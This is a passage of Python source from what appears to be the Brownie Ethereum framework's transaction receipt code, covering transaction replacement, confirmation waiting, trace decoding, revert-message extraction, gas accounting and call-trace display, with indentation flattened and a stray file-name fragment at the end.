def subcalls(self) -> Optional[List]:
if self._subcalls is None:
self._expand_trace()
return self._subcalls
@trace_property
def trace(self) -> Optional[List]:
if self._trace is None:
self._expand_trace()
return self._trace
@property
def timestamp(self) -> Optional[int]:
if self.status < 0:
return None
return web3.eth.get_block(self.block_number)["timestamp"]
@property
def confirmations(self) -> int:
if not self.block_number:
return 0
return web3.eth.block_number - self.block_number + 1
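# e.g. a tx mined in block 100 with the chain head at block 104 has 5 confirmations;
# a tx that has not been mined yet (block_number is None) reports 0.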
def replace(
self,
increment: Optional[float] = None,
gas_price: Optional[Wei] = None,
silent: Optional[bool] = None,
) -> "TransactionReceipt":
"""
Rebroadcast this transaction with a higher gas price.
Exactly one of `increment` and `gas_price` must be given.
Arguments
---------
increment : float, optional
Multiplier applied to the gas price of this transaction in order
to determine the new gas price
gas_price : Wei, optional
Absolute gas price to use in the replacement transaction
silent : bool, optional
Toggle console verbosity (default is same setting as this transaction)
Returns
-------
TransactionReceipt
New transaction object
"""
if increment is None and gas_price is None:
raise ValueError("Must give one of `increment` or `gas_price`")
if gas_price is not None and increment is not None:
raise ValueError("Cannot set `increment` and `gas_price` together")
if self.status > -1:
raise ValueError("Transaction has already confirmed")
if increment is not None:
gas_price = Wei(self.gas_price * increment)
if silent is None:
silent = self._silent
sender = self.sender
if isinstance(sender, EthAddress):
# if the transaction wasn't broadcast during this brownie session,
# check if the sender is unlocked - we might be able to replace anyway
from brownie import accounts
if sender in accounts:
sender = accounts.at(sender)
else:
raise ValueError("Sender address not in `accounts`")
return sender.transfer( # type: ignore
self.receiver,
self.value,
gas_limit=self.gas_limit,
gas_price=Wei(gas_price),
data=self.input,
nonce=self.nonce,
required_confs=0,
silent=silent,
)
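# Usage sketch (illustrative): bump the gas price of a still-pending transaction by 10%
#   new_tx = tx.replace(increment=1.1)
# or rebroadcast it at an explicit price (Wei accepts unit strings):
#   new_tx = tx.replace(gas_price="25 gwei")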
def wait(self, required_confs: int) -> None:
if required_confs < 1:
return
if self.confirmations > required_confs:
print(f"This transaction already has {self.confirmations} confirmations.")
return
while True:
try:
tx: Dict = web3.eth.get_transaction(self.txid)
break
except TransactionNotFound:
if self.nonce is not None:
sender_nonce = web3.eth.get_transaction_count(str(self.sender))
if sender_nonce > self.nonce:
self.status = Status(-2)
self._confirmed.set()
return
time.sleep(1)
self._await_confirmation(tx["blockNumber"], required_confs)
def _raise_if_reverted(self, exc: Any) -> None:
if self.status or CONFIG.mode == "console":
return
if not web3.supports_traces:
# if traces are not available, do not attempt to determine the revert reason
raise exc or ValueError("Execution reverted")
if self._dev_revert_msg is None:
# no revert message and unable to check dev string - have to get trace
self._expand_trace()
if self.contract_address:
source = ""
elif CONFIG.argv["revert"]:
source = self._traceback_string()
else:
source = self._error_string(1)
raise exc._with_attr(
source=source, revert_msg=self._revert_msg, dev_revert_msg=self._dev_revert_msg
)
def _await_transaction(self, required_confs: int, is_blocking: bool) -> None:
# await tx showing in mempool
while True:
try:
tx: Dict = web3.eth.get_transaction(HexBytes(self.txid))
break
except (TransactionNotFound, ValueError):
if self.sender is None:
# if sender was not explicitly set, this transaction was
# not broadcasted locally and so likely doesn't exist
raise
if self.nonce is not None:
sender_nonce = web3.eth.get_transaction_count(str(self.sender))
if sender_nonce > self.nonce:
self.status = Status(-2)
return
time.sleep(1)
self._set_from_tx(tx)
if not self._silent:
print(
f" Gas price: {color('bright blue')}{self.gas_price / 10 ** 9}{color} gwei"
f" Gas limit: {color('bright blue')}{self.gas_limit}{color}"
f" Nonce: {color('bright blue')}{self.nonce}{color}"
)
# await confirmation of tx in a separate thread which is blocking if
# required_confs > 0 or tx has already confirmed (`blockNumber` != None)
confirm_thread = threading.Thread(
target=self._await_confirmation, args=(tx["blockNumber"], required_confs), daemon=True
)
confirm_thread.start()
if is_blocking and (required_confs > 0 or tx["blockNumber"]):
confirm_thread.join()
def _await_confirmation(self, block_number: int = None, required_confs: int = 1) -> None:
block_number = block_number or self.block_number
if not block_number and not self._silent and required_confs > 0:
if required_confs == 1:
sys.stdout.write("\rWaiting for confirmation... ")
else:
sys.stdout.write(
f"\rRequired confirmations: {color('bright yellow')}0/{required_confs}{color}"
)
sys.stdout.flush()
# await first confirmation
while True:
# if sender nonce is greater than tx nonce, the tx should be confirmed
sender_nonce = web3.eth.get_transaction_count(str(self.sender))
expect_confirmed = bool(sender_nonce > self.nonce) # type: ignore
try:
receipt = web3.eth.wait_for_transaction_receipt(
HexBytes(self.txid), timeout=15, poll_latency=1
)
break
except TimeExhausted:
if expect_confirmed:
# if we expected confirmation based on the nonce, tx likely dropped
self.status = Status(-2)
self._confirmed.set()
return
self.block_number = receipt["blockNumber"]
# wait for more confirmations if required and handle uncle blocks
remaining_confs = required_confs
while remaining_confs > 0 and required_confs > 1:
try:
receipt = web3.eth.get_transaction_receipt(self.txid)
self.block_number = receipt["blockNumber"]
except TransactionNotFound:
if not self._silent:
sys.stdout.write(f"\r{color('red')}Transaction was lost...{color}{' ' * 8}")
sys.stdout.flush()
# check if tx is still in mempool, this will raise otherwise
tx = web3.eth.get_transaction(self.txid)
self.block_number = None
return self._await_confirmation(tx["blockNumber"], required_confs)
if required_confs - self.confirmations != remaining_confs:
remaining_confs = required_confs - self.confirmations
if not self._silent:
sys.stdout.write(
f"\rRequired confirmations: {color('bright yellow')}{self.confirmations}/"
f"{required_confs}{color} "
)
if remaining_confs == 0:
sys.stdout.write("\n")
sys.stdout.flush()
if remaining_confs > 0:
time.sleep(1)
self._set_from_receipt(receipt)
# if coverage evaluation is active, evaluate the trace
if (
CONFIG.argv["coverage"]
and not coverage._check_cached(self.coverage_hash)
and self.trace
):
self._expand_trace()
if not self._silent and required_confs > 0:
print(self._confirm_output())
# set the confirmation event and mark other tx's with the same nonce as dropped
self._confirmed.set()
for dropped_tx in state.TxHistory().filter(
sender=self.sender, nonce=self.nonce, key=lambda k: k != self
):
dropped_tx.status = Status(-2)
dropped_tx._confirmed.set()
def _set_from_tx(self, tx: Dict) -> None:
if not self.sender:
self.sender = EthAddress(tx["from"])
self.receiver = EthAddress(tx["to"]) if tx["to"] else None
self.value = Wei(tx["value"])
self.gas_price = tx["gasPrice"]
self.gas_limit = tx["gas"]
self.input = tx["input"]
self.nonce = tx["nonce"]
# if receiver is a known contract, set function name
if self.fn_name:
return
try:
contract = state._find_contract(tx["to"])
if contract is not None:
self.contract_name = contract._name
self.fn_name = contract.get_method(tx["input"])
except ContractNotFound:
# required in case the contract has self destructed
# other aspects of functionality will be broken, but this way we
# can at least return a receipt
pass
def _set_from_receipt(self, receipt: Dict) -> None:
"""Sets object attributes based on the transaction reciept."""
self.block_number = receipt["blockNumber"]
self.txindex = receipt["transactionIndex"]
self.gas_used = receipt["gasUsed"]
self.logs = receipt["logs"]
self.status = Status(receipt["status"])
self.contract_address = receipt["contractAddress"]
if self.contract_address and not self.contract_name:
self.contract_name = "UnknownContract"
base = (
f"{self.nonce}{self.block_number}{self.sender}{self.receiver}"
f"{self.value}{self.input}{int(self.status)}{self.gas_used}{self.txindex}"
)
self.coverage_hash = sha1(base.encode()).hexdigest()
if self.fn_name:
state.TxHistory()._gas(self._full_name(), receipt["gasUsed"], self.status == Status(1))
def _confirm_output(self) -> str:
status = ""
if not self.status:
revert_msg = self.revert_msg if web3.supports_traces else None
status = f"({color('bright red')}{revert_msg or 'reverted'}{color}) "
result = (
f"\r {self._full_name()} confirmed {status}- "
f"Block: {color('bright blue')}{self.block_number}{color} "
f"Gas used: {color('bright blue')}{self.gas_used}{color} "
f"({color('bright blue')}{self.gas_used / self.gas_limit:.2%}{color})"
)
if self.status and self.contract_address:
result += (
f"\n {self.contract_name} deployed at: "
f"{color('bright blue')}{self.contract_address}{color}"
)
return result + "\n"
def _get_trace(self) -> None:
"""Retrieves the stack trace via debug_traceTransaction and finds the
return value, revert message and event logs in the trace.
"""
# check if trace has already been retrieved, or the tx warrants it
if self._raw_trace is not None:
return
self._raw_trace = []
if self.input == "0x" and self.gas_used == 21000:
self._modified_state = False
self._trace = []
return
if not web3.supports_traces:
raise RPCRequestError("Node client does not support `debug_traceTransaction`")
try:
trace = web3.provider.make_request( # type: ignore
"debug_traceTransaction", (self.txid, {"disableStorage": CONFIG.mode != "console"})
)
except (requests.exceptions.Timeout, requests.exceptions.ConnectionError) as e:
msg = f"Encountered a {type(e).__name__} while requesting "
msg += "`debug_traceTransaction`. The local RPC client has likely crashed."
if CONFIG.argv["coverage"]:
msg += " If the error persists, add the `skip_coverage` marker to this test."
raise RPCRequestError(msg) from None
if "error" in trace:
self._modified_state = None
self._trace_exc = RPCRequestError(trace["error"]["message"])
raise self._trace_exc
self._raw_trace = trace = trace["result"]["structLogs"]
if not trace:
self._modified_state = False
return
if isinstance(trace[0]["gas"], str):
# handle traces where numeric values are returned as hex (Nethermind)
for step in trace:
step["gas"] = int(step["gas"], 16)
step["gasCost"] = int.from_bytes(HexBytes(step["gasCost"]), "big", signed=True)
step["pc"] = int(step["pc"], 16)
if self.status:
self._confirmed_trace(trace)
else:
self._reverted_trace(trace)
def _confirmed_trace(self, trace: Sequence) -> None:
self._modified_state = next((True for i in trace if i["op"] == "SSTORE"), False)
if trace[-1]["op"] != "RETURN" or self.contract_address:
return
contract = state._find_contract(self.receiver)
if contract:
data = _get_memory(trace[-1], -1)
fn = contract.get_method_object(self.input)
self._return_value = fn.decode_output(data)
def _reverted_trace(self, trace: Sequence) -> None:
self._modified_state = False
if self.contract_address:
step = next((i for i in trace if i["op"] == "CODECOPY"), None)
if step is not None and int(step["stack"][-3], 16) > 24577:
self._revert_msg = "exceeds EIP-170 size limit"
self._dev_revert_msg = ""
if self._dev_revert_msg is not None:
return
# iterate over revert instructions in reverse to find revert message
for step in (i for i in trace[::-1] if i["op"] in ("REVERT", "INVALID")):
if step["op"] == "REVERT" and int(step["stack"][-2], 16):
# get returned error string from stack
data = _get_memory(step, -1)
if data[:4].hex() == "0x4e487b71": # keccak of Panic(uint256)
error_code = int(data[4:].hex(), 16)
if error_code in SOLIDITY_ERROR_CODES:
self._revert_msg = SOLIDITY_ERROR_CODES[error_code]
else:
self._revert_msg = f"Panic (error code: {error_code})"
else:
self._revert_msg = decode_abi(["string"], data[4:])[0]
elif self.contract_address:
self._revert_msg = "invalid opcode" if step["op"] == "INVALID" else ""
self._dev_revert_msg = ""
return
# check for dev revert string using program counter
dev_revert = build._get_dev_revert(step["pc"]) or None
if dev_revert is not None:
self._dev_revert_msg = dev_revert
if self._revert_msg is None:
self._revert_msg = dev_revert
else:
# if none is found, expand the trace and get it from the pcMap
self._expand_trace()
try:
contract = state._find_contract(step["address"])
pc_map = contract._build["pcMap"]
# if this is the function selector revert, check for a jump
if "first_revert" in pc_map[step["pc"]]:
idx = trace.index(step) - 4
if trace[idx]["pc"] != step["pc"] - 4:
step = trace[idx]
# if this is the optimizer revert, find the actual source
if "optimizer_revert" in pc_map[step["pc"]]:
idx = trace.index(step) - 1
# look for the most recent jump
while trace[idx + 1]["op"] != "JUMPDEST":
if trace[idx]["source"] != step["source"]:
# if we find another line with a differing source offset prior
# to a JUMPDEST, the optimizer revert is also the actual revert
idx = trace.index(step)
break
idx -= 1
while not trace[idx]["source"]:
# now we're in a yul optimization, keep stepping back
# until we find a source offset
idx -= 1
# at last we have the real location of the revert
step["source"] = trace[idx]["source"]
step = trace[idx]
if "dev" in pc_map[step["pc"]]:
self._dev_revert_msg = pc_map[step["pc"]]["dev"]
else:
# extract the dev revert string from the source code
# TODO this technique appears superior to `_get_dev_revert`, and
# changes in solc 0.8.0 have necessitated it. the old approach
# of building a dev revert map should be refactored out in favor
# of this one.
source = contract._sources.get(step["source"]["filename"])
offset = step["source"]["offset"][1]
line = source[offset:].split("\n")[0]
marker = "//" if contract._build["language"] == "Solidity" else "#"
revert_str = line[line.index(marker) + len(marker) :].strip()
if revert_str.startswith("dev:"):
self._dev_revert_msg = revert_str
if self._revert_msg is None:
self._revert_msg = self._dev_revert_msg
return
except (KeyError, AttributeError, TypeError, ValueError):
pass
if self._revert_msg is not None:
if self._dev_revert_msg is None:
self._dev_revert_msg = ""
return
op = next((i["op"] for i in trace[::-1] if i["op"] in ("REVERT", "INVALID")), None)
self._revert_msg = "invalid opcode" if op == "INVALID" else ""
def _expand_trace(self) -> None:
"""Adds the following attributes to each step of the stack trace:
address: The address executing this contract.
contractName: The name of the contract.
fn: The name of the function.
jumpDepth: Number of jumps made since entering this contract. The
initial value is 0.
source: {
filename: path to the source file for this step
            offset: Start and end offsets of the associated source code
}
"""
if self._raw_trace is None:
self._get_trace()
if self._trace is not None:
# in case `_get_trace` also expanded the trace, do not repeat
return
self._trace = trace = self._raw_trace
self._new_contracts = []
self._internal_transfers = []
self._subcalls = []
if self.contract_address or not trace:
coverage._add_transaction(self.coverage_hash, {})
return
if trace[0]["depth"] == 1:
self._trace_origin = "geth"
self._call_cost = self.gas_used - trace[0]["gas"] + trace[-1]["gas"]
for t in trace:
t["depth"] = t["depth"] - 1
else:
self._trace_origin = "ganache"
if trace[0]["gasCost"] >= 21000:
# in ganache <6.10.0, gas costs are shifted by one step - we can
# identify this when the first step has a gas cost >= 21000
self._call_cost = trace[0]["gasCost"]
for i in range(len(trace) - 1):
trace[i]["gasCost"] = trace[i + 1]["gasCost"]
trace[-1]["gasCost"] = 0
else:
self._call_cost = self.gas_used - trace[0]["gas"] + trace[-1]["gas"]
# last_map gives a quick reference of previous values at each depth
last_map = {0: _get_last_map(self.receiver, self.input[:10])} # type: ignore
coverage_eval: Dict = {last_map[0]["name"]: {}}
for i in range(len(trace)):
# if depth has increased, tx has called into a different contract
if trace[i]["depth"] > trace[i - 1]["depth"]:
step = trace[i - 1]
if step["op"] in ("CREATE", "CREATE2"):
# creating a new contract
out = next(x for x in trace[i:] if x["depth"] == step["depth"])
address = out["stack"][-1][-40:]
sig = f"<{step['op']}>"
calldata = None
self._new_contracts.append(EthAddress(address))
if int(step["stack"][-1], 16):
self._add_internal_xfer(step["address"], address, step["stack"][-1])
else:
# calling an existing contract
stack_idx = -4 if step["op"] in ("CALL", "CALLCODE") else -3
offset = int(step["stack"][stack_idx], 16)
length = int(step["stack"][stack_idx - 1], 16)
calldata = HexBytes("".join(step["memory"]))[offset : offset + length]
sig = calldata[:4].hex()
address = step["stack"][-2][-40:]
last_map[trace[i]["depth"]] = _get_last_map(address, sig)
coverage_eval.setdefault(last_map[trace[i]["depth"]]["name"], {})
self._subcalls.append(
{"from": step["address"], "to": EthAddress(address), "op": step["op"]}
)
if step["op"] in ("CALL", "CALLCODE"):
self._subcalls[-1]["value"] = int(step["stack"][-3], 16)
if calldata and last_map[trace[i]["depth"]].get("function"):
fn = last_map[trace[i]["depth"]]["function"]
self._subcalls[-1]["function"] = fn._input_sig
try:
zip_ = zip(fn.abi["inputs"], fn.decode_input(calldata))
inputs = {i[0]["name"]: i[1] for i in zip_} # type: ignore
self._subcalls[-1]["inputs"] = inputs
except Exception:
self._subcalls[-1]["calldata"] = calldata.hex()
elif calldata:
self._subcalls[-1]["calldata"] = calldata.hex()
# update trace from last_map
last = last_map[trace[i]["depth"]]
trace[i].update(
address=last["address"],
contractName=last["name"],
fn=last["internal_calls"][-1],
jumpDepth=last["jumpDepth"],
source=False,
)
opcode = trace[i]["op"]
if opcode == "CALL" and int(trace[i]["stack"][-3], 16):
self._add_internal_xfer(
last["address"], trace[i]["stack"][-2][-40:], trace[i]["stack"][-3]
)
try:
pc = last["pc_map"][trace[i]["pc"]]
except (KeyError, TypeError):
# we don't have enough information about this contract
continue
if trace[i]["depth"] and opcode in ("RETURN", "REVERT", "INVALID", "SELFDESTRUCT"):
subcall: dict = next(
i for i in self._subcalls[::-1] if i["to"] == last["address"] # type: ignore
)
if opcode == "RETURN":
returndata = _get_memory(trace[i], -1)
if returndata:
fn = last["function"]
try:
return_values = fn.decode_output(returndata)
if len(fn.abi["outputs"]) == 1:
return_values = (return_values,)
subcall["return_value"] = return_values
except Exception:
subcall["returndata"] = returndata.hex()
else:
subcall["return_value"] = None
elif opcode == "SELFDESTRUCT":
subcall["selfdestruct"] = True
else:
if opcode == "REVERT":
data = _get_memory(trace[i], -1)
if len(data) > 4:
try:
subcall["revert_msg"] = decode_abi(["string"], data[4:])[0]
except Exception:
subcall["revert_msg"] = data.hex()
if "revert_msg" not in subcall and "dev" in pc:
subcall["revert_msg"] = pc["dev"]
if "path" not in pc:
continue
trace[i]["source"] = {"filename": last["path_map"][pc["path"]], "offset": pc["offset"]}
if "fn" not in pc:
continue
# calculate coverage
if last["coverage"]:
if pc["path"] not in coverage_eval[last["name"]]:
coverage_eval[last["name"]][pc["path"]] = [set(), set(), set()]
if "statement" in pc:
coverage_eval[last["name"]][pc["path"]][0].add(pc["statement"])
if "branch" in pc:
if pc["op"] != "JUMPI":
last["active_branches"].add(pc["branch"])
elif "active_branches" not in last or pc["branch"] in last["active_branches"]:
# false, true
key = 1 if trace[i + 1]["pc"] == trace[i]["pc"] + 1 else 2
coverage_eval[last["name"]][pc["path"]][key].add(pc["branch"])
if "active_branches" in last:
last["active_branches"].remove(pc["branch"])
# ignore jumps with no function - they are compiler optimizations
if "jump" in pc:
# jump 'i' is calling into an internal function
if pc["jump"] == "i":
try:
fn = last["pc_map"][trace[i + 1]["pc"]]["fn"]
except (KeyError, IndexError):
continue
if fn != last["internal_calls"][-1]:
last["internal_calls"].append(fn)
last["jumpDepth"] += 1
# jump 'o' is returning from an internal function
elif last["jumpDepth"] > 0:
del last["internal_calls"][-1]
last["jumpDepth"] -= 1
coverage._add_transaction(
self.coverage_hash, dict((k, v) for k, v in coverage_eval.items() if v)
)
def _add_internal_xfer(self, from_: str, to: str, value: str) -> None:
self._internal_transfers.append( # type: ignore
{"from": EthAddress(from_), "to": EthAddress(to), "value": Wei(f"0x{value}")}
)
def _full_name(self) -> str:
if self.contract_name and self.fn_name:
return f"{self.contract_name}.{self.fn_name}"
return self.fn_name or "Transaction"
def info(self) -> None:
"""Displays verbose information about the transaction, including decoded event logs."""
result = f"Tx Hash: {self.txid}\nFrom: {self.sender}\n"
if self.contract_address and self.status:
result += f"New {self.contract_name} address: {self.contract_address}\n"
else:
result += f"To: {self.receiver}\n" f"Value: {self.value}\n"
if self.input != "0x" and int(self.input, 16):
result += f"Function: {self._full_name()}\n"
result += (
f"Block: {self.block_number}\nGas Used: "
f"{self.gas_used} / {self.gas_limit} "
f"({self.gas_used / self.gas_limit:.1%})\n"
)
if self.events:
events = list(self.events)
call_tree: List = ["--------------------------"]
while events:
idx = next(
(events.index(i) for i in events if i.address != events[0].address), len(events)
)
contract = state._find_contract(events[0].address)
if contract:
try:
name = contract.name()
except Exception:
name = contract._name
sub_tree: List = [f"{name} ({events[0].address})"]
else:
sub_tree = [f"{events[0].address}"]
for event in events[:idx]:
sub_tree.append([event.name, *(f"{k}: {v}" for k, v in event.items())])
call_tree.append(sub_tree)
events = events[idx:]
event_tree = build_tree([call_tree], multiline_pad=0, pad_depth=[0, 1])
result = f"{result}\nEvents In This Transaction\n{event_tree}"
result = color.highlight(result)
status = ""
if not self.status:
status = f"({color('bright red')}{self.revert_msg or 'reverted'}{color})"
print(f"Transaction was Mined {status}\n---------------------\n{result}")
def _get_trace_gas(self, start: int, stop: int) -> Tuple[int, int]:
total_gas = 0
internal_gas = 0
is_internal = True
trace = self.trace
for i in range(start, stop):
# Check if we are in a subfunction or not
if is_internal and not _step_compare(trace[i], trace[start]):
is_internal = False
# For the internal gas tracking we ignore the gas passed to an external call
if trace[i]["depth"] > trace[start]["depth"]:
internal_gas -= trace[i - 1]["gasCost"]
elif not is_internal and _step_compare(trace[i], trace[start]):
is_internal = True
total_gas += trace[i]["gasCost"]
if is_internal:
internal_gas += trace[i]["gasCost"]
# manually add gas refunds where they occur
if trace[i]["op"] == "SSTORE" and int(trace[i]["stack"][-2], 16) == 0:
# 15000 gas is refunded if a word is set to 0x0
# Note: There is currently no way to check if the value was 0x0 before.
# This will give an incorrect refund if 0x0 is assigned to 0x0.
total_gas -= 15000
if is_internal:
internal_gas -= 15000
if trace[i]["op"] == "SELFDESTRUCT":
# 24000 gas is refunded on selfdestruct
total_gas -= 24000
if is_internal:
internal_gas -= 24000
# For external calls, add the remaining gas returned back
if start > 0 and trace[start]["depth"] > trace[start - 1]["depth"]:
total_gas += trace[start - 1]["gasCost"]
internal_gas += trace[start - 1]["gasCost"]
return internal_gas, total_gas
@trace_inspection
def call_trace(self, expand: bool = False) -> None:
"""
Display the complete sequence of contracts and methods called during
the transaction. The format:
Contract.functionName [instruction] start:stop [gas used]
* start:stop are index values for the `trace` member of this object,
showing the points where the call begins and ends
* for calls that include subcalls, gas use is displayed as
[gas used in this frame / gas used in this frame + subcalls]
* Calls displayed in red ended with a `REVERT` or `INVALID` instruction.
Arguments
---------
expand : bool
If `True`, show an expanded call trace including inputs and return values
"""
trace = self.trace
key = _step_internal(
trace[0], trace[-1], 0, len(trace), self._get_trace_gas(0, len(self.trace))
)
call_tree: List = [[key]]
active_tree: List = [call_tree[0]]
        # (index, depth, jumpDepth) for relevant steps in the trace
trace_index = [(0, 0, 0)] + [
(i, trace[i]["depth"], trace[i]["jumpDepth"])
for i in range(1, len(trace))
if not _step_compare(trace[i], trace[i - 1])
]
subcalls = self.subcalls[::-1]
for i, (idx, depth, jump_depth) in enumerate(trace_index[1:], start=1):
last = trace_index[i - 1]
if depth == last[1] and jump_depth < last[2]:
# returning from an internal function, reduce tree by one
active_tree.pop()
continue
elif depth < last[1]:
                # returning from an external call, pop the tree back by the
                # previous frame's jumpDepth + 1
active_tree = active_tree[: -(last[2] + 1)]
continue
if depth > last[1]:
# called to a new contract
end = next((x[0] for x in trace_index[i + 1 :] if x[1] < depth), len(trace))
total_gas, internal_gas = self._get_trace_gas(idx, end)
key = _step_external(
trace[idx],
trace[end - 1],
idx,
end,
(total_gas, internal_gas),
subcalls.pop(),
expand,
)
elif depth == last[1] and jump_depth > last[2]:
# jumped into an internal function
end = next(
(
x[0]
for x in trace_index[i + 1 :]
if x[1] < depth or (x[1] == depth and x[2] < jump_depth)
),
len(trace),
)
total_gas, internal_gas = self._get_trace_gas(idx, end)
key = _step_internal(
trace[idx], trace[end - 1], idx, end, (total_gas, internal_gas)
)
active_tree[-1].append([key])
active_tree.append(active_tree[-1][-1])
print(
f"Call trace for '{color('bright blue')}{self.txid}{color}':\n"
f"Initial call cost [{color('bright yellow')}{self._call_cost} gas{color}]"
)
print(build_tree(call_tree).rstrip())
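    # Illustrative sketch (editor's note, hypothetical contract and values): one line
    # of the rendered tree might read
    #   Token.transfer [CALL] 1:312 [4123 / 8456 gas]
    # i.e. trace indices 1 to 312, with 4123 gas spent in this frame and 8456 gas
    # including subcalls, following the format described in the docstring above.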
def traceback(self) -> None:
print(self._traceback_string() or "")
@trace_inspection
def _traceback_string(self) -> str:
"""Returns an error traceback for the transaction."""
if self.status == 1:
return ""
trace = self.trace
try:
idx = next(i for i in range(len(trace)) if trace[i]["op"] in ("REVERT", "INVALID"))
trace_range = range(idx, -1, -1)
except StopIteration:
return ""
try:
result = [next(i for i in trace_range if trace[i]["source"])]
except StopIteration:
return ""
depth, jump_depth = trace[idx]["depth"], trace[idx]["jumpDepth"]
while True:
try:
idx = next(
i
for i in trace_range
if trace[i]["depth"] < depth
or (trace[i]["depth"] == depth and trace[i]["jumpDepth"] < jump_depth)
)
result.append(idx)
depth, jump_depth = trace[idx]["depth"], trace[idx]["jumpDepth"]
except StopIteration:
break
return f"{color}Traceback for '{color('bright blue')}{self.txid}{color}':\n" + "\n".join(
self._source_string(i, 0) for i in result[::-1]
)
def error(self, pad: int = 3) -> None:
print(self._error_string(pad) or "")
@trace_inspection
def _error_string(self, pad: int = 3) -> str:
"""Returns the source code that caused the transaction to revert.
Args:
pad: Number of unrelated lines of code to include before and after
Returns: source code string
"""
if self.status == 1:
return ""
# if RPC returned a program counter, try to find source without querying trace
if self._revert_pc:
highlight, linenos, path, fn_name = build._get_error_source_from_pc(self._revert_pc)
if highlight:
return _format_source(highlight, linenos, path, self._revert_pc, -1, fn_name)
self._revert_pc = None
# iterate backward through the trace until a step has a source offset
trace = self.trace
trace_range = range(len(trace) - 1, -1, -1)
try:
idx = next(i for i in trace_range if trace[i]["op"] in {"REVERT", "INVALID"})
idx = next(i for i in trace_range if trace[i]["source"])
return self._source_string(idx, pad)
except StopIteration:
return ""
def source(self, idx: int, pad: int = 3) -> None:
print(self._source_string(idx, pad) or "")
@trace_inspection
def _source_string(self, idx: int, pad: int) -> str:
"""Displays the associated source code for a given stack trace step.
Args:
idx: Stack trace step index
pad: Number of unrelated lines of code to include before and after
Returns: source code string
"""
trace = self.trace[idx]
if not trace.get("source", None):
return ""
contract = state._find_contract(self.trace[idx]["address"])
source, linenos = highlight_source(
contract._sources.get(trace["source"]["filename"]), trace["source"]["offset"], pad
)
if not source:
return ""
return _format_source(
source,
linenos,
trace["source"]["filename"],
trace["pc"],
self.trace.index(trace),
trace["fn"],
)
def _format_source(source: str, linenos: Tuple, path: Path, pc: int, idx: int, fn_name: str) -> str:
ln = f" {color('bright blue')}{linenos[0]}"
if linenos[1] > linenos[0]:
ln = f"s{ln}{color('dark white')}-{color('bright blue')}{linenos[1]}"
return (
f"{color('dark white')}Trace step {color('bright blue')}{idx}{color('dark white')}, "
f"program counter {color('bright blue')}{pc}{color('dark white')}:\n {color('dark white')}"
f"File {color('bright magenta')}\"{path}\"{color('dark white')}, line{ln}"
f"{color('dark white')}, in {color('bright cyan')}{fn_name}{color('dark white')}:{source}"
)
def _step_compare(a: Dict, b: Dict) -> bool:
return a["depth"] == b["depth"] and a["jumpDepth"] == b["jumpDepth"]
def _step_internal(
step: Dict,
last_step: Dict,
start: Union[str, int],
stop: Union[str, int],
gas: Tuple[int, int],
subcall: Dict = None,
) -> str:
if last_step["op"] in {"REVERT", "INVALID"} and _step_compare(step, last_step):
contract_color = color("bright red")
else:
contract_color = color("bright cyan") if not step["jumpDepth"] else color()
key = f"{color('dark white')}{contract_color}{step['fn']} {color('dark white')}"
left_bracket = f"{color('dark white')}["
right_bracket = f"{color('dark white')}]"
if subcall:
key = f"{key}[{color}{subcall['op']}{right_bracket} "
key = f"{key}{start}:{stop}{color}"
if gas:
if gas[0] == gas[1]:
gas_str = f"{color('bright yellow')}{gas[0]} gas"
else:
gas_str = f"{color('bright yellow')}{gas[0]} / {gas[1]} gas"
key = f"{key} {left_bracket}{gas_str}{right_bracket}{color}"
if last_step["op"] == "SELFDESTRUCT":
key = f"{key} {left_bracket}{color('bright red')}SELFDESTRUCT{right_bracket}{color}"
return key
def _convert_0x_to_empty_bytes(value: Any) -> Any:
# black cannot parse `0x` without any trailing zeros, so we temporarily
# replace it with an empty bytestring
final = []
for item in value:
if isinstance(item, (list, tuple)):
final.append(_convert_0x_to_empty_bytes(item))
elif str(item) == "0x":
final.append(b"")
else:
final.append(item)
return type(value)(final)
def _format(value: Any) -> str:
if isinstance(value, (list, tuple)):
value = _convert_0x_to_empty_bytes(value)
mode = black.FileMode(line_length=60)
value = black.format_str(str(value), mode=mode).replace('b""', "0x")
return str(value)
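# Illustrative sketch (editor's note, assumed example value): black cannot parse a bare
# `0x` literal, so _format temporarily swaps it for an empty bytestring before
# formatting and restores it afterwards, e.g.
#   _format(("0x", 1))   # roughly "(0x, 1)" once black has reflowed the tuple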
def _step_external(
step: Dict,
last_step: Dict,
start: Union[str, int],
stop: Union[str, int],
gas: Tuple[int, int],
subcall: Dict,
expand: bool,
) -> str:
key = _step_internal(step, last_step, start, stop, gas, subcall)
if not expand:
return key
result: List = [key, f"address: {step['address']}"]
if "value" in subcall:
result.append(f"value: {subcall['value']}")
if "inputs" not in subcall:
result.append(f"calldata: {subcall.get('calldata')}")
elif subcall["inputs"]:
result.append(
["input arguments:", *(f"{k}: {_format(v)}" for k, v in subcall["inputs"].items())]
)
else:
result.append("input arguments: None")
if "return_value" in subcall:
value = subcall["return_value"]
if isinstance(value, tuple) and len(value) > 1:
result.append(["return values:", *(_format(i) for i in value)])
else:
if isinstance(value, tuple):
value = value[0]
result.append(f"return value: {_format(value)}")
elif "returndata" in subcall:
result.append(f"returndata: {subcall['returndata']}")
if "revert_msg" in subcall:
result.append(f"revert reason: {color('bright red')}{subcall['revert_msg']}{color}")
return build_tree([result], multiline_pad=0).rstrip()
def _get_memory(step: Dict, idx: int) -> HexBytes:
offset = int(step["stack"][idx], 16)
length = int(step["stack"][idx - 1], 16)
data = HexBytes("".join(step["memory"]))[offset : offset + length]
# append zero-bytes if allocated memory ends before `length` bytes
data = HexBytes(data + b"\x00" * (length - len(data)))
return data
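# Illustrative sketch (editor's note, hypothetical trace step): memory is stored as a
# list of 32-byte words in hex, and the stack addresses data as [..., length, offset].
#   step = {"stack": ["0x20", "0x00"], "memory": ["00" * 32]}
#   _get_memory(step, -1)   # offset 0x00, length 0x20 -> HexBytes of 32 zero bytes
# The helper slices the flattened memory and zero-pads the result whenever the
# allocated memory ends before `length` bytes.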
def _get_last_map(address: EthAddress, sig: str) -> Dict:
contract = state._find_contract(address)
last_map = {"address": EthAddress(address), "jumpDepth": 0, "name": None, "coverage": False}
if contract:
if contract.get_method(sig):
full_fn_name = f"{contract._name}.{contract.get_method(sig)}"
else:
full_fn_name = contract._name
last_map.update(
contract=contract,
function=contract.get_method_object(sig),
name=contract._name,
internal_calls=[full_fn_name],
path_map=contract._build.get("allSourcePaths"),
pc_map=contract._build.get("pcMap"),
)
if isinstance(contract._project, project_main.Project):
# only evaluate coverage for contracts that are part of a `Project`
last_map["coverage"] = True
if contract._build["language"] == "Solidity":
last_map["active_branches"] = set()
else:
last_map.update(contract=None, internal_calls=[f"<UnknownContract>.{sig}"], pc_map=None)
return last_map
|
base.py
|
import base64
import hashlib
